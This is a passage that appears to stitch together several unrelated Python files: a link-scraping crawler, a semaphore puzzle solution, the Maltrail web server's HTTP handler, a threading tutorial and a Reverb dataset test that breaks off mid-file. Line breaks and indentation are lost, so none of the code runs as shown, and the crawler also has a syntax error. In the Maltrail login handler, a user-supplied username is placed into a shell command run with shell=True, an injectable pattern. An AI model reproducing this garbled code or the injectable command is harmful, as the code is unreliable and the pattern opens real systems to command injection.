from threading import Thread import requests from requests.auth import HTTPBasicAuth import time import re def craw(crawlin): global result global count print('crawlin on {} \n'.format(crawlin), end ='' ) res = browser.get(crawlin) ret = re.findall('<a rel="nofollow" target="_blank" href=".*</a>', res.text) for site in ret: site = site.split('"') site = site[5] site = site.replace("http://","") result.append(site) count += 1 print("done {} \n".format(count) , end='') url = input("nhap link : ") browser = requests.Session() pages = int(input("nhap so trang : ")) result = [] def read(result): f = open("sites.txt", "r") for line in f: result.append(line) f.close() def write(result): f = open("sites.txt", "w") for line in result: f.write(line + "\n") f.close() count = 0 for i in range(0,pages): Thread(target=craw, args={url +"?page=" str(i + 1)}).start() while(count != pages): time.sleep(2) write(result) print("All done")
main.py
# This solution is somewhat close to one presented on the book, # but pusher and smoker responsibilities are united in single worker. from threading import Semaphore, Lock, Thread io = Lock() agent = Semaphore(1) tobacco = Semaphore(0) paper = Semaphore(0) match = Semaphore(0) def agent_a(): while True: agent.acquire() with io: print('agent_a') tobacco.release() paper.release() def agent_b(): while True: agent.acquire() with io: print('agent_b') paper.release() match.release() def agent_c(): while True: agent.acquire() with io: print('agent_c') tobacco.release() match.release() lock = Semaphore(1) available = set() turnstile = Semaphore(0) def smoker_a(): while True: tobacco.acquire() lock.acquire() available.add('tobacco') if len(available) == 2: turnstile.release() turnstile.release() lock.release() turnstile.acquire() if available == {'tobacco', 'paper'}: with io: print('smoker_a') available.clear() agent.release() def smoker_b(): while True: paper.acquire() lock.acquire() available.add('paper') if len(available) == 2: turnstile.release() turnstile.release() lock.release() turnstile.acquire() if available == {'paper', 'match'}: with io: print('smoker_b') available.clear() agent.release() def smoker_c(): while True: match.acquire() lock.acquire() available.add('match') if len(available) == 2: turnstile.release() turnstile.release() lock.release() turnstile.acquire() if available == {'tobacco', 'match'}: with io: print('smoker_c') available.clear() agent.release() threads = [Thread(target=f) for f in [agent_a, agent_b, agent_c, smoker_a, smoker_b, smoker_c]] for thread in threads: thread.start() for thread in threads: thread.join()
httpd.py
#!/usr/bin/env python """ Copyright (c) 2014-2020 Maltrail developers (https://github.com/stamparm/maltrail/) See the file 'LICENSE' for copying permission """ from __future__ import print_function import datetime import glob import gzip import hashlib import io import json import mimetypes import os import re import socket import subprocess import threading import time import traceback from core.addr import addr_to_int from core.addr import int_to_addr from core.addr import make_mask from core.attribdict import AttribDict from core.common import get_regex from core.common import ipcat_lookup from core.common import worst_asns from core.compat import xrange from core.enums import HTTP_HEADER from core.settings import config from core.settings import CONTENT_EXTENSIONS_EXCLUSIONS from core.settings import DATE_FORMAT from core.settings import DISABLED_CONTENT_EXTENSIONS from core.settings import DISPOSED_NONCES from core.settings import HTML_DIR from core.settings import HTTP_TIME_FORMAT from core.settings import IS_WIN from core.settings import MAX_NOFILE from core.settings import NAME from core.settings import PING_RESPONSE from core.settings import SERVER_HEADER from core.settings import SESSION_COOKIE_NAME from core.settings import SESSION_COOKIE_FLAG_SAMESITE from core.settings import SESSION_EXPIRATION_HOURS from core.settings import SESSION_ID_LENGTH from core.settings import SESSIONS from core.settings import UNAUTHORIZED_SLEEP_TIME from core.settings import UNICODE_ENCODING from core.settings import VERSION from thirdparty import six from thirdparty.six.moves import BaseHTTPServer as _BaseHTTPServer from thirdparty.six.moves import http_client as _http_client from thirdparty.six.moves import socketserver as _socketserver from thirdparty.six.moves import urllib as _urllib try: # Reference: https://bugs.python.org/issue7980 # Reference: http://code-trick.com/python-bug-attribute-error-_strptime/ import _strptime except ImportError: pass try: import resource resource.setrlimit(resource.RLIMIT_NOFILE, (MAX_NOFILE, MAX_NOFILE)) except: pass def start_httpd(address=None, port=None, join=False, pem=None): """ Starts HTTP server """ class ThreadingServer(_socketserver.ThreadingMixIn, _BaseHTTPServer.HTTPServer): def server_bind(self): self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) _BaseHTTPServer.HTTPServer.server_bind(self) def finish_request(self, *args, **kwargs): try: _BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs) except: if config.SHOW_DEBUG: traceback.print_exc() class SSLThreadingServer(ThreadingServer): def __init__(self, server_address, pem, HandlerClass): import OpenSSL # python-openssl ThreadingServer.__init__(self, server_address, HandlerClass) ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_2_METHOD) ctx.use_privatekey_file(pem) ctx.use_certificate_file(pem) self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type)) self.server_bind() self.server_activate() def shutdown_request(self, request): try: request.shutdown() except: pass class ReqHandler(_BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(self): path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "") params = {} content = None skip = False if hasattr(self, "data"): params.update(_urllib.parse.parse_qs(self.data)) if query: params.update(_urllib.parse.parse_qs(query)) for key in params: if params[key]: params[key] = params[key][-1] if path == '/': path = "index.html" path = path.strip('/') extension = os.path.splitext(path)[-1].lower() if hasattr(self, "_%s" % path): content = getattr(self, "_%s" % path)(params) else: path = path.replace('/', os.path.sep) path = os.path.abspath(os.path.join(HTML_DIR, path)).strip() if not os.path.isfile(path) and os.path.isfile("%s.html" % path): path = "%s.html" % path if any((config.IP_ALIASES,)) and self.path.split('?')[0] == "/js/main.js": content = open(path, "rb").read() content = re.sub(r"\bvar IP_ALIASES =.+", "var IP_ALIASES = {%s};" % ", ".join('"%s": "%s"' % (_.split(':', 1)[0].strip(), _.split(':', 1)[-1].strip()) for _ in config.IP_ALIASES), content) self.send_response(_http_client.OK) elif ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS): mtime = time.gmtime(os.path.getmtime(path)) if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE) if if_modified_since and extension not in (".htm", ".html"): if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0] if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)): self.send_response(_http_client.NOT_MODIFIED) self.send_header(HTTP_HEADER.CONNECTION, "close") skip = True if not skip: content = open(path, "rb").read() last_modified = time.strftime(HTTP_TIME_FORMAT, mtime) self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream") self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified) # For CSP policy directives see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/ self.send_header(HTTP_HEADER.CONTENT_SECURITY_POLICY, "default-src 'self'; style-src 'self' 'unsafe-inline'; img-src *; " + "script-src 'self' 'unsafe-eval' https://stat.ripe.net; " + "frame-src *; object-src 'none'; block-all-mixed-content;") if extension not in (".htm", ".html"): self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT") # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/ self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate") # Reference: http://stackoverflow.com/a/5084555 else: self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache") else: self.send_response(_http_client.NOT_FOUND) self.send_header(HTTP_HEADER.CONNECTION, "close") content = b'<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0] if content is not None: if isinstance(content, six.text_type): content = content.encode(UNICODE_ENCODING) for match in re.finditer(b"<\\!(\\w+)\\!>", content): name = match.group(1).decode(UNICODE_ENCODING) _ = getattr(self, "_%s" % name.lower(), None) if _: content = self._format(content, **{ name: _() }) if "gzip" in self.headers.get(HTTP_HEADER.ACCEPT_ENCODING): self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip") _ = six.BytesIO() compress = gzip.GzipFile("", "w+b", 9, _) compress._stream = _ compress.write(content) compress.flush() compress.close() content = compress._stream.getvalue() self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content))) self.end_headers() try: if content: self.wfile.write(content) self.wfile.flush() except: pass def do_POST(self): length = self.headers.get(HTTP_HEADER.CONTENT_LENGTH) data = self.rfile.read(int(length)).decode(UNICODE_ENCODING) data = _urllib.parse.unquote_plus(data) self.data = data self.do_GET() def get_session(self): retval = None cookie = self.headers.get(HTTP_HEADER.COOKIE) if cookie: match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie) if match: session = match.group(1) if session in SESSIONS: if SESSIONS[session].client_ip != self.client_address[0]: pass elif SESSIONS[session].expiration > time.time(): retval = SESSIONS[session] else: del SESSIONS[session] if retval is None and not config.USERS: retval = AttribDict({"username": "?"}) return retval def delete_session(self): cookie = self.headers.get(HTTP_HEADER.COOKIE) if cookie: match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie) if match: session = match.group(1) if session in SESSIONS: del SESSIONS[session] def version_string(self): return SERVER_HEADER def end_headers(self): if not hasattr(self, "_headers_ended"): _BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self) self._headers_ended = True def log_message(self, format, *args): return def finish(self): try: _BaseHTTPServer.BaseHTTPRequestHandler.finish(self) except: if config.SHOW_DEBUG: traceback.print_exc() def _version(self): return VERSION def _logo(self): if config.HEADER_LOGO: retval = config.HEADER_LOGO else: retval = '<img src="images/mlogo.png" style="width: 25px">altrail' return retval def _format(self, content, **params): if content: for key, value in params.items(): content = content.replace(b"<!%s!>" % key.encode(UNICODE_ENCODING), value.encode(UNICODE_ENCODING)) return content def _login(self, params): valid = False if params.get("username") and params.get("hash") and params.get("nonce"): if params.get("nonce") not in DISPOSED_NONCES: DISPOSED_NONCES.add(params.get("nonce")) for entry in (config.USERS or []): entry = re.sub(r"\s", "", entry) username, stored_hash, uid, netfilter = entry.split(':') try: uid = int(uid) except ValueError: uid = None if username == params.get("username"): try: if params.get("hash") == hashlib.sha256((stored_hash.strip() + params.get("nonce")).encode(UNICODE_ENCODING)).hexdigest(): valid = True break except: if config.SHOW_DEBUG: traceback.print_exc() if valid: _ = os.urandom(SESSION_ID_LENGTH) session_id = _.hex() if hasattr(_, "hex") else _.encode("hex") expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") cookie = "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration))) if config.USE_SSL: cookie += "; Secure" if SESSION_COOKIE_FLAG_SAMESITE: cookie += "; SameSite=strict" self.send_header(HTTP_HEADER.SET_COOKIE, cookie) if netfilter in ("", '*', "::", "0.0.0.0/0"): netfilters = None else: addresses = set() netmasks = set() for item in set(re.split(r"[;,]", netfilter)): item = item.strip() if '/' in item: _ = item.split('/')[-1] if _.isdigit() and int(_) >= 16: lower = addr_to_int(item.split('/')[0]) mask = make_mask(int(_)) upper = lower | (0xffffffff ^ mask) while lower <= upper: addresses.add(int_to_addr(lower)) lower += 1 else: netmasks.add(item) elif '-' in item: _ = item.split('-') lower, upper = addr_to_int(_[0]), addr_to_int(_[1]) while lower <= upper: addresses.add(int_to_addr(lower)) lower += 1 elif re.search(r"\d+\.\d+\.\d+\.\d+", item): addresses.add(item) netfilters = netmasks if addresses: netfilters.add(get_regex(addresses)) SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "mask_custom": config.ENABLE_MASK_CUSTOM and uid >= 1000, "expiration": expiration, "client_ip": self.client_address[0]}) else: time.sleep(UNAUTHORIZED_SLEEP_TIME) self.send_response(_http_client.UNAUTHORIZED) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") content = "Login %s" % ("success" if valid else "failed") if not IS_WIN: try: subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True) except Exception: if config.SHOW_DEBUG: traceback.print_exc() return content def _logout(self, params): self.delete_session() self.send_response(_http_client.FOUND) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.LOCATION, "/") def _whoami(self, params): session = self.get_session() username = session.username if session else "" self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") return username def _check_ip(self, params): session = self.get_session() if session is None: self.send_response(_http_client.UNAUTHORIZED) self.send_header(HTTP_HEADER.CONNECTION, "close") return None self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") try: result_worst = worst_asns(params.get("address")) if result_worst: result_ipcat = result_worst else: _ = (ipcat_lookup(params.get("address")) or "").lower().split(' ') result_ipcat = _[1] if _[0] == 'the' else _[0] return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()}) except: if config.SHOW_DEBUG: traceback.print_exc() def _trails(self, params): self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") return open(config.TRAILS_FILE, "rb").read() def _ping(self, params): self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") return PING_RESPONSE def _events(self, params): session = self.get_session() if session is None: self.send_response(_http_client.UNAUTHORIZED) self.send_header(HTTP_HEADER.CONNECTION, "close") return None start, end, size, total = None, None, -1, None content = None log_exists = False dates = params.get("date", "") if ".." in dates: pass elif '_' not in dates: try: date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d") event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date) if os.path.exists(event_log_path): range_handle = open(event_log_path, "rb") log_exists = True except ValueError: print("[!] invalid date format in request") log_exists = False else: logs_data = "" date_interval = dates.split("_", 1) try: start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date() end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date() for i in xrange(int((end_date - start_date).days) + 1): date = start_date + datetime.timedelta(i) event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d")) if os.path.exists(event_log_path): log_handle = open(event_log_path, "rb") logs_data += log_handle.read() log_handle.close() range_handle = io.BytesIO(logs_data) log_exists = True except ValueError: print("[!] invalid date format in request") log_exists = False if log_exists: range_handle.seek(0, 2) total = range_handle.tell() range_handle.seek(0) if self.headers.get(HTTP_HEADER.RANGE): match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE]) if match: start, end = int(match.group(1)), int(match.group(2)) max_size = end - start + 1 end = min(total - 1, end) size = end - start + 1 if start == 0 or not session.range_handle: session.range_handle = range_handle if session.netfilters is None and not session.mask_custom: session.range_handle.seek(start) self.send_response(_http_client.PARTIAL_CONTENT) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total)) content = session.range_handle.read(size) else: self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") buffer, addresses, netmasks, regex = io.StringIO(), set(), [], "" for netfilter in session.netfilters or []: if not netfilter: continue if '/' in netfilter: netmasks.append(netfilter) elif re.search(r"\A[\d.]+\Z", netfilter): addresses.add(netfilter) elif "\\." in netfilter: regex = r"\b(%s)\b" % netfilter else: print("[!] invalid network filter '%s'" % netfilter) return for line in session.range_handle: display = session.netfilters is None ip = None line = line.decode(UNICODE_ENCODING, "ignore") if regex: match = re.search(regex, line) if match: ip = match.group(1) display = True if not display and (addresses or netmasks): for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line): if not display: ip = match.group(1) else: break if ip in addresses: display = True break elif netmasks: for _ in netmasks: prefix, mask = _.split('/') if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix): addresses.add(ip) display = True break if session.mask_custom and "(custom)" in line: line = re.sub(r'("[^"]+"|[^ ]+) \(custom\)', "- (custom)", line) if display: if ",%s" % ip in line or "%s," % ip in line: line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? " % re.escape(ip), " %s " % ip, line) buffer.write(line) if buffer.tell() >= max_size: break content = buffer.getvalue() end = start + len(content) - 1 self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size))) if len(content) < max_size: session.range_handle.close() session.range_handle = None if size == -1: self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") self.end_headers() with range_handle as f: while True: data = f.read(io.DEFAULT_BUFFER_SIZE) if not data: break else: self.wfile.write(data) else: self.send_response(_http_client.OK) # instead of _http_client.NO_CONTENT (compatibility reasons) self.send_header(HTTP_HEADER.CONNECTION, "close") if self.headers.get(HTTP_HEADER.RANGE): self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0") return content def _counts(self, params): counts = {} session = self.get_session() if session is None: self.send_response(_http_client.UNAUTHORIZED) self.send_header(HTTP_HEADER.CONNECTION, "close") return None self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json") match = re.search(r"\d+\-\d+\-\d+", params.get("from", "")) if match: min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT) else: min_ = datetime.datetime.fromtimestamp(0) match = re.search(r"\d+\-\d+\-\d+", params.get("to", "")) if match: max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT) else: max_ = datetime.datetime.now() min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0) max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999) for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))): filename = os.path.basename(filepath) if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename): continue try: current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT) except: if config.SHOW_DEBUG: traceback.print_exc() else: if min_ <= current <= max_: timestamp = int(time.mktime(current.timetuple())) size = os.path.getsize(filepath) with open(filepath, "rb") as f: content = f.read(io.DEFAULT_BUFFER_SIZE) if size >= io.DEFAULT_BUFFER_SIZE: total = 1.0 * content.count(b'\n') * size / io.DEFAULT_BUFFER_SIZE counts[timestamp] = int(round(total / 100) * 100) else: counts[timestamp] = content.count(b'\n') return json.dumps(counts) class SSLReqHandler(ReqHandler): def setup(self): self.connection = self.request self.rfile = socket._fileobject(self.request, "rb", self.rbufsize) self.wfile = socket._fileobject(self.request, "wb", self.wbufsize) # IPv6 support if ':' in (address or ""): address = address.strip("[]") _BaseHTTPServer.HTTPServer.address_family = socket.AF_INET6 # Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py _AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0) _NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV _address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4] else: _address = (address or '', int(port) if str(port or "").isdigit() else 0) try: if pem: server = SSLThreadingServer(_address, pem, SSLReqHandler) else: server = ThreadingServer(_address, ReqHandler) except Exception as ex: if "Address already in use" in str(ex): exit("[!] another instance already running") elif "Name or service not known" in str(ex): exit("[!] invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS) elif "Cannot assign requested address" in str(ex): exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS) else: raise print("[i] starting HTTP%s server at 'http%s://%s:%d/'" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1])) print("[o] running...") if join: server.serve_forever() else: thread = threading.Thread(target=server.serve_forever) thread.daemon = True thread.start()
Multi_Thread.py
# 线程是操作系统直接支持的执行单元 # Python的线程是真正的Posix Thread, 不是虚拟出来的线程 # Python的标准库提供了两个模块: _thread和threading, # _thread是低级模块, threading是高级模块, 对_thread进行了封装 # 启动一个线程就是把一个函数传入并创建Thread实例, 然后调用start()开始执行 import time, threading # 新线程执行的代码 def loop(): print('thread %s is running...' % threading.current_thread().name) n = 0 while n < 5: n = n + 1 print('thread %s >>> %s' % (threading.current_thread().name, n)) time.sleep(1) print('thread %s ended.' % threading.current_thread().name) print('thread %s is running...' % threading.current_thread().name) t = threading.Thread(target=loop, name='LoopThread') t.start() t.join() print('thread %s ended.' % threading.current_thread().name)
dataset_test.py
# Lint as: python3 # Copyright 2019 DeepMind Technologies Limited. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for dataset.""" import threading import time from absl.testing import parameterized import numpy as np from reverb import client from reverb import dataset as reverb_dataset from reverb import errors from reverb import item_selectors from reverb import rate_limiters from reverb import replay_sample from reverb import server as reverb_server import tensorflow.compat.v1 as tf import tree from tensorflow.python.framework import tensor_spec # pylint:disable=g-direct-tensorflow-import def make_server(): return reverb_server.Server( tables=[ reverb_server.Table( 'dist', sampler=item_selectors.Prioritized(priority_exponent=1), remover=item_selectors.Fifo(), max_size=1000000, rate_limiter=rate_limiters.MinSize(1)), reverb_server.Table( 'signatured', sampler=item_selectors.Prioritized(priority_exponent=1), remover=item_selectors.Fifo(), max_size=1000000, rate_limiter=rate_limiters.MinSize(1), signature=tf.TensorSpec(dtype=tf.float32, shape=(None, None))), reverb_server.Table( 'bounded_spec_signatured', sampler=item_selectors.Prioritized(priority_exponent=1), remover=item_selectors.Fifo(), max_size=1000000, rate_limiter=rate_limiters.MinSize(1), # Currently only the `shape` and `dtype` of the bounded spec # is considered during signature check. # TODO(b/158033101): Check the boundaries as well. signature=tensor_spec.BoundedTensorSpec( dtype=tf.float32, shape=(None, None), minimum=(0.0, 0.0), maximum=(10.0, 10.)), ), ], port=None, ) class ReplayDatasetTest(tf.test.TestCase, parameterized.TestCase): @classmethod def setUpClass(cls): super().setUpClass() cls._server = make_server() cls._client = client.Client(f'localhost:{cls._server.port}') def tearDown(self): super().tearDown() self._client.reset('dist') self._client.reset('signatured') self._client.reset('bounded_spec_signatured') @classmethod def tearDownClass(cls): super().tearDownClass() cls._server.stop() def _populate_replay(self, sequence_length=100, max_time_steps=None): max_time_steps = max_time_steps or sequence_length with self._client.writer(max_time_steps) as writer: for i in range(1000): writer.append([np.zeros((3, 3), dtype=np.float32)]) if i % 5 == 0 and i >= sequence_length: writer.create_item( table='dist', num_timesteps=sequence_length, priority=1) writer.create_item( table='signatured', num_timesteps=sequence_length, priority=1) writer.create_item( table='bounded_spec_signatured', num_timesteps=sequence_length, priority=1) def _sample_from(self, dataset, num_samples): iterator = dataset.make_initializable_iterator() dataset_item = iterator.get_next() self.evaluate(iterator.initializer) return [self.evaluate(dataset_item) for _ in range(num_samples)] @parameterized.named_parameters( { 'testcase_name': 'default_values', }, { 'testcase_name': 'num_workers_per_iterator_is_0', 'num_workers_per_iterator': 0, 'want_error': ValueError, }, { 'testcase_name': 'num_workers_per_iterator_is_1', 'num_workers_per_iterator': 1, }, { 'testcase_name': 'num_workers_per_iterator_is_minus_1', 'num_workers_per_iterator': -1, }, { 'testcase_name': 'num_workers_per_iterator_is_minus_2', 'num_workers_per_iterator': -2, 'want_error': ValueError, }, { 'testcase_name': 'max_samples_per_stream_is_0', 'max_samples_per_stream': 0, 'want_error': ValueError, }, { 'testcase_name': 'max_samples_per_stream_is_1', 'max_samples_per_stream': 1, }, { 'testcase_name': 'max_samples_per_stream_is_minus_1', 'max_samples_per_stream': -1, }, { 'testcase_name': 'max_samples_per_stream_is_minus_2', 'num_workers_per_iterator': -2, 'want_error': ValueError, }, { 'testcase_name': 'max_in_flight_samples_per_worker_is_0', 'max_in_flight_samples_per_worker': 0, 'want_error': ValueError, }, { 'testcase_name': 'max_in_flight_samples_per_worker_is_1', 'max_in_flight_samples_per_worker': 1, }, { 'testcase_name': 'max_in_flight_samples_per_worker_is_minus_1', 'max_in_flight_samples_per_worker': -1, 'want_error': ValueError, }, ) def test_sampler_parameter_validation(self, **kwargs): dtypes = (tf.float32,) shapes = (tf.TensorShape([3, 3]),) if 'max_in_flight_samples_per_worker' not in kwargs: kwargs['max_in_flight_samples_per_worker'] = 100 if 'want_error' in kwargs: error = kwargs.pop('want_error') with self.assertRaises(error): reverb_dataset.ReplayDataset(self._client.server_address, 'dist', dtypes, shapes, **kwargs) else: reverb_dataset.ReplayDataset(self._client.server_address, 'dist', dtypes, shapes, **kwargs) def test_iterate(self): self._populate_replay() dataset = reverb_dataset.ReplayDataset( tf.constant(self._client.server_address), table=tf.constant('dist'), dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), max_in_flight_samples_per_worker=100) got = self._sample_from(dataset, 10) for sample in got: self.assertIsInstance(sample, replay_sample.ReplaySample) # A single sample is returned so the key should be a scalar int64. self.assertIsInstance(sample.info.key, np.uint64) np.testing.assert_array_equal(sample.data[0], np.zeros((3, 3), dtype=np.float32)) def test_distribution_strategy(self): self._populate_replay() physical_devices = tf.config.list_physical_devices('CPU') configs = tf.config.experimental.get_virtual_device_configuration( physical_devices[0]) if configs is None: virtual_devices = [tf.config.experimental.VirtualDeviceConfiguration() for _ in range(4)] tf.config.experimental.set_virtual_device_configuration( physical_devices[0], virtual_devices) strategy = tf.distribute.MirroredStrategy(['/cpu:%d' % i for i in range(4)]) def reverb_dataset_fn(i): tf.print('Creating dataset for replica; index:', i) return reverb_dataset.ReplayDataset( self._client.server_address, table=tf.constant('dist'), dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), max_in_flight_samples_per_worker=100).take(2) def dataset_fn(_): return tf.data.Dataset.range(4).flat_map(reverb_dataset_fn).take(2 * 4) ds = strategy.experimental_distribute_datasets_from_function(dataset_fn) def check_probabilities(_, v): probability = v.info.probability self.assertLen(probability.values, 4) # Don't use any math ops since tensor values seem to contain # unaligned tensors on some systems; but tf.print doesn't check alignment. # # This seems to be caused by a compatibility issue where DistStrat isn't # well tested when eager mode is disabled. So instead of treating this # as a true TF bug, we just work around it. We can remove this hack and # convert it to e.g. tf.assert_greater type check if/when we enable eager # execution for these tests. tf.print('Probability values:', probability.values) def get_next_value(v): return tf.distribute.get_replica_context().merge_call( check_probabilities, args=(v,)) @tf.function def run_strategy(ds_): i = tf.constant(0) for v in ds_: strategy.run(get_next_value, args=(v,)) i += 1 return i rs = run_strategy(ds) # Each iteration contains 4 items - one from each replica. We take 8 items # total, so there should be 2 iterations. self.assertEqual(2, self.evaluate(rs)) def test_timeout_invalid_arguments(self): with self.assertRaisesRegex(ValueError, r'must be an integer >= -1'): reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), rate_limiter_timeout_ms=-2, max_in_flight_samples_per_worker=100) def test_timeout(self): dataset_0s = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), rate_limiter_timeout_ms=0, max_in_flight_samples_per_worker=100) dataset_1s = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), rate_limiter_timeout_ms=1000, max_in_flight_samples_per_worker=100) dataset_2s = reverb_dataset.ReplayDataset( self._client.server_address, table='dist', dtypes=(tf.float32,), shapes=(tf.TensorShape([3, 3]),), rate_limiter_timeout_ms=2000, max_in_flight_samples_per_worker=100) start_time = time.time() with self.assertRaisesWithPredicateMatch(tf.errors.OutOfRangeError, r'End of sequence'): self._sample_from(dataset_0s, 1) duration = time.time() - start_time self.assertGreaterEqual(duration, 0) self.assertLess(duration, 5) start_time = time.time() with self.assertRaisesWithPredicateMatch(tf.errors.OutOfRangeError, r'End of sequence'): self._sample_from(dataset_1s, 1) duration = time.time() - start_time self.assertGreaterEqual(duration, 1) self.assertLess(duration, 10) start_time = time.time() with self.assertRaisesWithPredicateMatch(tf.errors.OutOfRangeError, r'End of sequence'): self._sample_from(dataset_2s, 1) duration = time.time() - start_time self.assertGreaterEqual(duration, 2) self.assertLess(duration, 10) # If we insert some data, and the rate limiter doesn't force any waiting, # then we can ask for a timeout of 0s and still get data back. self._populate_replay() got = self._sample_from(dataset_0s, 2) self.assertLen(got, 2) @parameterized.parameters(['signatured'], ['bounded_spec_signatured']) def test_inconsistent_signature_size(self, table_name): self._populate_replay() dataset = reverb_dataset.ReplayDataset( self._client.server_address, table=table_name, dtypes=(tf.float32, tf.float64), shapes=(tf.TensorShape([3, 3]), tf.TensorShape([])), max_in_flight_samples_per_worker=100) with self.assertRaisesWithPredicateMatch( tf.errors.InvalidArgumentError, r'Inconsistent number of tensors requested from table \'{}\'. ' r'Requested 6 tensors, but table signature shows 5 tensors.'.format( table_name)): self._sample_from(dataset, 10) @parameterized.parameters(['signatured'], 